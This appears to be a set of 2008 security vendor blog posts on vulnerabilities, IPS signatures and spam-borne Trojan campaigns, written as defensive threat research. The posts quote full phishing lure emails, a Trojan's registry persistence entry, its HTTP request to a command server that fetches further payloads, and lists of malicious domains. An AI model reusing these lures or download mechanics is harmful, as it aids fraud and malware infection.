MS OneNote Handler Vulnerability (Sep 11,2008)

/in /by

Microsoft Office OneNote is a new component of the Microsoft Office Suite. Microsoft Office OneNote is a digital notebook that provides people one place to gather their notes and information, powerful search to find what they are looking for quickly, and easy-to-use shared notebooks so that they can manage information overload and work together more effectively.

Microsoft Office OneNote registers a protocol handler with the Windows registry, named “onenote” with the format “onenote://”. This handler enables the OneNote executable to be launched from the Microsoft Internet Explorer browser. The onenote handler, however, can trigger a buffer-overrun vulnerability in mso.dll, which can cause malicious executable code injected and executed in the target client.

Microsoft has released an advisory MS08-055 to address this vulnerability, which can be found here. In this advisory, the Maximum Security Impact of this vulnerability is scored as CRITICAL. To protect the SonicWALL customers from being affected by this vulnerability, the SonicWALL UTM team has developed the following IPS signatures:

  • 3482 MS OneNote URL Validation Error 4 (MS08-055)
  • 3479 MS OneNote URL Validation Error 3 (MS08-055)
  • 3476 MS OneNote URL Validation Error 2 (MS08-055)
  • 3474 MS OneNote URL Validation Error 1 (MS08-055)

Google Chrome Vulnerabilities (Sep 4, 2008)

/in /by

On September 2nd 2008 Google released Chrome, an open source web browser. Chrome uses tabs as primary component of its user interface. It uses the (open source) WebKit rendering engine on advice from the Android team.

One of Chrome’s design goals is improving security. It is achieved by:
1. Each tab in Chrome is sandboxed into its own process.
2. Plugins are run in separate processes that communicate with the renderer.
3. Chrome periodically downloads updates of phishing and malware blacklists.

Just hours after the release, a few vulnerabilities in Google Chrome were discovered. One is that Chrome allows files (e.g., executables) to be automatically downloaded to the user’s computer without any user prompt. Another is a denial-of-service vulnerability; Chrome will crash when it loads a web page which has an undefined handler followed by a special character.

SonicWALL has tested and confirmed these vulnerabilities on Google Chrome version 0.2.149.27, Build 1583. Two signatures were released on September 3rd to detect and block attacks targeting these vulnerabilities. The signatures are:

  • (3458) WEB-CLIENT Google Chrome Automatic File Download PoC
  • (3459) WEB-CLIENT Google Chrome Undefined Handler DoS PoC

Spammed zipped Trojans (Sep 4, 2008)

/in /by

SonicWALL UTM Research Team has observed multiple Trojan spam runs in last one week starting August 27, 2008 which included the Labor day weekend. Common part among all the spam was the Trojan arrives via email in a zipped archive attachment.

Summary:

Western Union MTCN spam
Online Flight Ticket spam
Airmail Express delivery failure spam
Fedex Tracking number spam

Western Union MTCN spam

This spam wave started on August 27, 2008 and continued for 2 days. The e-mail contains a fake message about your Western Union money transfer transaction being halted or bounced. The e-mails look like following:

Attachment:

  • RN67761263.zip (contains file RN67761263.exe)
  • In776162.zip (contains file In776162.exe)

Subjects: Western Union MTCN #<10 digit Number>

Message Body:
——————
Hello!

Attention! The wire sent to Maksim Zverev, Moscow, Russia has been blocked by our security service.

Your credit card issuing bank has halted the transaction by the demand of the Federal Criminal Investigation Service (case No. <5 digit number> since the recipient has been undergoing the international retrieval by the InterPol.

Please contact the closest Western Union office and make sure you have your ID card, the credit card that was used for making the payment, and the invoice file with you.

(The invoice file is attached to this message; please print it out and hand it to our agent.)

You can find the address of the closest Western Union agent on our website at http://www.westernunion.com

Thank you!
——————

SonicWALL detection for these Trojans:

  • GAV: Zbot.EJX (Trojan) [Hits recorded: 851]
  • GAV: ZBot.EJW (Trojan) [Hits recorded: 4,210]

Online Flight Ticket spam

The first wave of this spam was seen on August 28, 2008 which lasted just 1 day. Another wave of this spam campaign with different attachment name started on Labor day and continued until September 2, 2008. The e-mail pretends to be containing an online flight ticket invoice. The e-mails look like following:

Attachment:

  • eTicket_N832.zip (contains file eTicket_N832.exe)
  • e-Ticket_S737.zip (contains file e-Ticket_S737.exe)

Subjects: Your Online Flight Ticket N <5 digit number>

Message Body:
——————
Dear customers, Thank you for using our new service “Buy airplane ticket Online” on our website. Your account has been created:

Your login: Your password: pass<4 random characters>

Your credit card has been charged for $6XX.XX. [where X can be 0-9] We would like to remind you that whenever you order tickets on our website you get a discount of 10%! Attached to this message is the purchase Invoice and the flight ticket. To use your ticket, simply print it on a color printed, and you are set to take off for the journey!

Kind regards, Virgin America
——————

SonicWALL detection for these Trojans:

  • GAV: AutoRun.WK (Worm) [Hits recorded: 7,892]
  • GAV: Emold.A_2 (Trojan) [Hits recorded: 107,996]

Airmail Express delivery failure spam

The first wave of this spam was seen on August 28, 2008 which lasted for 2 days. Another wave of this spam campaign with different attachment name started on Labor day and continued until September 3, 2008. The e-mail contains a fake message about not being able to deliver the postal package you sent and it asks you to take a print out of attached copy of invoice. The e-mails look like following:

Attachment:

  • AIRMAIL#7661224.zip (contains file AIRMAIL#7661224.exe)
  • AIRMAIL_76612.zip (contains file AIRMAIL_76612.exe)
  • #876712.zip (contains file #876712.exe)
  • 5322412.zip (contains file 5322412.exe)

Subjects:

  • AIRMAIL EXPRESS $_ < random number >
  • Airmail Tracking number #<7 digit random number>

Message Body:
——————
Unfortunately we were not able to deliver postal package you sent on August the 1st in time because the recipients address is not correct. Please print out the invoice copy attached and collect the package at our office

AIRMAIL EXPRESS
——————

SonicWALL detection for these Trojans:

  • GAV: Zbot.AIR (Trojan) [Hits recorded: 198,947]
  • GAV: Zbot.EKQ (Trojan) [Hits recorded: 38]
  • GAV: Zbot.EMQ (Trojan) [Hits recorded: 266]
  • GAV: Zbot.EOD (Trojan) [Hits recorded: 4068]
  • GAV: Zbot.ENM (Trojan) [Hits recorded: 34,337]

Fedex Tracking number spam

This spam started on Labor day and continued until September 2, 2008. The e-mail contains a fake message about not being able to deliver the postal package you sent and it asks you to take a print out of attached copy of invoice. The e-mails look like following:

Attachment: TR87190-18721.doc.zip (contains file TR87190-18721.doc.exe)

Subjects: Tracking N <10 digit random number>

Message Body:
——————
Unfortunately we were not able to deliver postal package you sent on July the 25 in time because the recipients address is not correct. Please print out the invoice copy attached and collect the package at our office.

Your FEDEX www.fedex.com
——————

SonicWALL detection for these Trojans: GAV: Agent.ACCI (Trojan) [Hits recorded: 895]

Symantec Veritas SFS Auth Bypass (Aug 28, 2008)

/in /by

The Symantec Veritas Storage Foundation is a storage management suite. The product is composed of several services and agents. One of the services included in this suite is the Scheduler service which listens on TCP port 4888 by default. This is an RPC service with its own built in authentication mechanism.

The authentication mechanism in the Scheduler service utilizes the NT Lan Manager Security Support Provider (NTLM SSP) for security enforcement. The improper utilization of this component allows remote users to establish a NULL session with the service which effectively bypasses the authentication stage of the login procedure. This allows anonymous user logon to the affected service.

Exploitation of this vulnerability may allow anonymous malicious users to add, modify and delete snapshot schedules as well as potentionally run malicious code. SonicWALL has released an IPS signature to detect and block possible attack attempts targeting this vulnerability. The following signature covers this issue:

  • (5204) Symantec Veritas SFW NTLMSSP Authentication Bypass PoC

IBM Lotus Product IPS Signatures Summary

/in /by

IBM Lotus series products were very popular years ago, and they are still some clients’ favorite now. The products include Domino Web Server, Notes, Sametime Server/Client and so on.

Although the products are very useful to most of the clients, there are a lot of vulnerabilities in the products. For example, there was a HTTP Header Accept-Language Buffer Overflow vulnerability in IBM Lotus Domino Server products. Whenever a relatively long string following the Accept-Language header is sent to the server running products with the vulnerabilities, the stack buffer of the program will be overwritten, and the stack return addresses or exception handlers will be modified accordingly. This may allow an attack to inject and execute the malicious code.

SonicWALL UTM Research Team has spent quite long time researching and developing signatures for these vulnerabilities, and we are still doing the research continuously. Now we have 36 signatures related to these vulnerabilities, and they are listed below:

  • 1044 IBM Lotus Sametime Server Multiplexer BO 1
  • 1045 IBM Lotus Sametime Server Multiplexer BO 2
  • 1393 IBM Lotus Domino Web Access (inotes6W.dll) ActiveX Control BO Exploit
  • 1397 IBM Lotus Domino Web Access (dwa7W.dll) ActiveX Control BO PoC
  • 1401 IBM Lotus Domino Web Access (dwa7W.dll) ActiveX Control BO Exploit
  • 1555 IBM Lotus Notes DOC Attachment Viewer BO PoC
  • 1560 IBM Lotus Notes MIF Attachment Viewer BO Attempt 1
  • 1561 IBM Lotus Notes MIF Attachment Viewer BO Attempt 2
  • 1562 IBM Lotus Notes MIF Attachment Viewer BO Attempt 3
  • 1563 IBM Lotus Notes MIF Attachment Viewer BO Attempt 4
  • 1566 IBM Lotus Notes MIF Attachment Viewer BO Attempt 5
  • 1567 IBM Lotus Notes MIF Attachment Viewer BO Attempt 6
  • 1568 IBM Lotus Notes HTML Message Handling BO PoC 1
  • 1582 IBM Lotus Notes HTML Message Handling BO PoC 2
  • 2015 IBM Lotus Expeditor cai URI Handler Command Execution Attempt 1
  • 2016 IBM Lotus Expeditor cai URI Handler Command Execution Attempt 2
  • 2017 IBM Lotus Expeditor cai URI Handler Command Execution Attempt 3
  • 2026 IBM Lotus Expeditor cai URI Handler Command Execution Attempt 4
  • 3121 Lotus Domino Server 7.0 Denial of Service
  • 4025 IBM Lotus Domino LDAP Server Memory Exception PoC
  • 4026 IBM Lotus Notes HTML Speed Reader Long URL BO Attempt
  • 4327 IBM Lotus Notes UUE File Handling BO PoC
  • 4351 IBM Lotus Domino LDAP Invalid DN BO PoC
  • 4352 IBM Lotus Domino LDAP Invalid DN BO PoC 2
  • 4436 IBM Lotus Domino Web Access Message Handling DoS
  • 4438 IBM Lotus Domino Web Service DoS PoC
  • 4439 IBM Lotus Notes Cross Site Scripting PoC
  • 4463 Lotus Notes URI Handler Argument Injection PoC
  • 4563 IBM Lotus Notes Cross Site Scripting PoC 2
  • 4666 IBM Lotus Domino Web Access (dwa7W.dll) ActiveX Control BO Exploit 2
  • 4779 IBM Lotus Domino Web Access (inotes6W.dll) ActiveX Control BO Exploit 2
  • 4940 IBM Lotus Notes Applix Graphics Parsing BO PoC
  • 4984 IBM Lotus Notes WPD Attachment BO PoC
  • 5027 IBM Lotus Domino Web Server HTTP Header BO PoC
  • 5157 IBM Lotus 1-2-3 Work Sheet File Viewer BO PoC
  • 5192 IBM Lotus Domino Accept-Language BO

These signatures have well protected the SonicWALL clients from being attacked, and the following statistics show last 2 months of attack attempts blocked by SonicWALL.

Flash ads hijack cliboard (Aug 21, 2008)

/in /by

August 21, 2008

In the Web attacks, which affect Mac, Windows, and Linux users running Firefox, IE, and Safari, bad guys are seizing control of the machine’s clipboard. This is a clever new way to spread malware. If someone replies to an e-mail, they may paste from the clipboard, and get the URL. Likewise with blog posts, social-networking sites, anywhere you paste.

Flash banner ads are using ActionScript code to load (persistently) a malicious URL into a target clipboard. They may be using the Flash command setClipboard. The Flash9b.ocx module is used to parse the file. A number of legitimate sites have been seen to host ads carrying the attack: including Newsweek, Digg, and MSNBC.com.

The URL points to a fake anti-virus program. So-called rogue security programs either make bogus claims that the user’s machine is infected with malware in an attempt to dupe people into buying the software, or in some cases, downloads malware rather than real antivirus software.

The particular variant used in this attack is FakeAlert.TY which we have alerted on July 18, 2008. SonicWALL blocks this attack proactively with GAV: Fakealert.TY (Trojan) signature.

screenshot

We have also released a signature for a variant of the Flash copy-paste exploit – GAV: SWF.CB (Exploit). SonicWALL UTM Research Team is still monitoring for new variants of these attacks and will research them as soon as they appear.

New Contract Downloader Trojan (August 20, 2008)

/in /by

Starting August 19, 2008, we are seeing a new Downloader-Trojan being spammed on the Internet. It arrives as an e-mail attachment in a zip archive. The e-mails look like following:

Attachment: contract-N3.zip (contains file contract-N3.exe)

Subjects:

  • Your new labour contract
  • Contract of Retirement
  • Contract of settlements
  • Loan Contract
  • Permit for retirement
  • Record in debit of account

Message Body:

——————

Dear Sirs,

We have prepared a contract and added the paragraphs that you wanted to see in it. Our lawyers made alterations on the last page. If you agree with all the provisions we are ready to make the payment on Friday for the first consignment.

We are enclosing the file with the prepared contract.

If necessary, we can send it by fax. Looking forward to your decision.

——————

Upon execution, the malware executable creates a directory C:Program FilesMicrosoft Common and drops a copy of itself as wuauclt.exe. It also adds the following registry entry to automaticaly start itself on system reboot:

HKLM…Image File Execution Optionsexplorer.exeDebugger: C:Program FilesMicrosoft Commonwuauclt.exe

The Trojan also tries to connect to aaszxu.ru domain which is hosted in UKRAINE and sends following GET request to it:

GET /load3/ld.php?v=1&rs=615903122&n=1 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914) Host: aaszxu.ru

This GET request in return loads following URLs which keeps changing and points to another Trojan [detected as GAV: Wigon.EG (Trojan) by SonicWALL]:

  • hxxp://REMOVEDshclub.ro/img/scan.exe
  • hxxp://REMOVEDmickel.de/cerec/bilder/scan.exe
  • hxxp://REMOVEDnocorp.com/images/scan.exe

SonicWALL detects this new Trojan downloader as GAV: FakeAlert.GP (Trojan).

Postcard Storm Wave (Aug 6, 2008)

/in /by

Aug 6, 2008

A new wave of e-mails was discovered with following subjects:

  • You Have An Ecard
  • A card for you
  • Someone sent you an Ecard.
  • Your Digital Greeting Card is waiting

They are pointing to the following domains:

  • bestlettercard.com
  • supergreetingcard.com
  • freepostcardonline.com
  • worldpostcardart.com
  • superlettercard.com
  • digitalaudiopostcard.com
  • audiopostcardmail.com
  • lettercardadvertising.com
  • yourlettercard.com
  • oldpostcardshop.com

Here are a few examples of such e-mails:

screenshot

The email contains a fake message claiming your neighbor or flatmate has sent you a greeting card along with a link. If the user clicks on the link , it opens up a page and prompts the user to download postcard.exe file which is the new variant of Storm worm.

screenshot

SonicWALL detects this new wave with following signatures:

GAV: Zhelatin.ZN_13 (Worm)

BBC Georgia's President Trojan (Aug 15, 2008)

/in /by

Aug 15, 2008

Starting August 15, 2008, a new wave of malicious e-mails is being spammed with following subjects:

  • BBC NEWS.
  • Weekly BBC NEWS.
  • Your subscription.

The headlines in the email claim that Georgian president Mikheil Saakashvili is gay. Messages contain a linked image of the President from the BBC website:

Emails include links that are pointing to the following domains:

  • aguadodecea.com
  • elitezeitung.de
  • farmaciacardelus.com
  • freeweb.8k.ro
  • petstogoodhomes.com
  • thecar.fr
  • transporter.tv
  • vishalkullarwar.com
  • www.oris-uk.com
  • xrevolution.de
  • and others

All these locations redirect to a single IP (79.135.167.49).
The name of the malware is “name.avi.exe”.

SonicWALL detects this new wave with following signature:

GAV: FakeAlert.gen (Trojan)

Remote Desktop Software (Aug 15, 2008)

/in /by

Remote desktop software is software which allows graphical applications to be run remotely on a server, while being displayed locally. The remote desktop software consists of two separate computer programs, a “host version” that is installed on the computer to be controlled, and a “client version” that is installed on the controlling computer.

Remote desktop software can be divided into two categories. The first group doesn’t have a centralized server — host version software and client version software finds each other directly. Examples of this type of software include Microsoft Remote Desktop Connection and software use the VNC protocol. When host version software and client version software sit in the same network they work pretty well. However, in the scenario client version software and host version software sit in different networks, for example, a home network and a corporate network, setting up the connection could be tricky.

The second group of remote desktop software uses a centralized server to track active peers. When host version software starts, it signs in to the centralized server; the centralized server will assign a temporary ID to the machine. By providing the temporary ID to the centralized server, client version software gets necessary information of the machine it tries to connect. Host version software and client version software then try to connect to each other, either directly or through the centralized server. Examples of this type of software include GoToMyPC and TeamViewer. Typically this type of software provides great functionality to bypass firewalls.

Remote desktop software is made to increase computer users’ productivity. However, misusing the software could bring up security issues. Therefore some companies have policies that disallow the usage of remote desktop software from external networks.